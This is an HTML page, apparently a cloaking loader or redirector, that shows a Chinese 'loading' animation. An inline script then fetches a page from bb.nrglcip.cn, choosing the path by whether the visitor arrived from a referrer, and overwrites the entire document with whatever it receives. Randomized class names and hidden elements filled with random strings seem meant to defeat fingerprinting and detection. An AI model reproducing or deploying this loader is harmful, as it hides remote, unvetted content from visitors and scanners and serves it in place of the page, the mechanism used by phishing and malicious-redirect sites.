<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .q3OaavVQZnA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .q3OaavVQZnA .Vc5gCNuFh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .q3OaavVQZnA .content {
            line-height: 50px;
            text-align: center
        }

        .q3OaavVQZnA .img {
            width: 100%
        }

        .q3OaavVQZnA .DnQiGYEG {
            text-align: center
        }

        .q3OaavVQZnA .DnQiGYEG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .q3OaavVQZnA .DnQiGYEG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .q3OaavVQZnA .DnQiGYEG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .q3OaavVQZnA .DnQiGYEG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .q3OaavVQZnA .DnQiGYEG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .q3OaavVQZnA .DnQiGYEG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .q3OaavVQZnA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function B3Khd818C(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var znn2qU = B3Khd818C('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ znn2qU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ znn2qU +".html?a=share";
		}
		
        otkhzdO=url+"#"+new Date().getTime();
        otkhzdO && function() {
            $.get(otkhzdO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>QPsb316Z9OxuwQVxkpccxMK1iYVmnp0mqgh8WoPgMqJCrjzwPrfezOiRcDVPeW2e</a>
<span style='display:none'>uXPeNu9sBYh7AKQghTiCBLgw9cmLcSFq1TUPjpfRqd</span>
<li style='display:none' >vfNNaKsmnRE7AEKUXoPGtXFxr0AvuLZF7k6TMr4vuLPGIGwSMblQUrS2NtmAfGskH</li>
<div style='display:none'>qave6dfltw34bf1w7TJjPsycIpe6RIPXHwFnBqn70eJh0TzCZmuBzuzRQf95JjtrSkW</div><div class="q3OaavVQZnA">
    <div class="Vc5gCNuFh">
        <div class="DnQiGYEG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >Ij1Ruwq78LFKUBrPiFH1f3Nr1zD8q04sA9b8EjrcRdUVcY1DKkZ4JLy3CB9KyYRKr1Ngn8VOHwAVunYg3KcHNYpf2HeM8stZZz0sZ</b>
<ul style='display:none' >b0NM8OZacscbbBVMBkcogjqbwb6GwvWIXV4GeS9Ahvv1ja7PW27vaAQnUZF9cx2ffWIH2ymqteKM</ul>
<ul style='display:none' >b0NM8OZacscbbBVMBkcogjqbwb6GwvWIXV4GeS9Ahvv1ja7PW27vaAQnUZF9cx2ffWIH2ymqteKM</ul>
<a  href='#' style='display:none'>WoSfNVRd0Dk8QEkwZfFGiKKSThxE5kjiThtU20ozLm07L0WN1vPMNyLPTwFtjwJujmVSKIGEncN0TQ8cUL7CSjpH5aY</a>
<p  style='display:none'>EmaIwMcNSVCRMmsws75HfOuc26AghNiia53aQfhopatIdns5iEgUZSk20s</p>
<p  style='display:none'>EmaIwMcNSVCRMmsws75HfOuc26AghNiia53aQfhopatIdns5iEgUZSk20s</p></body>
</html>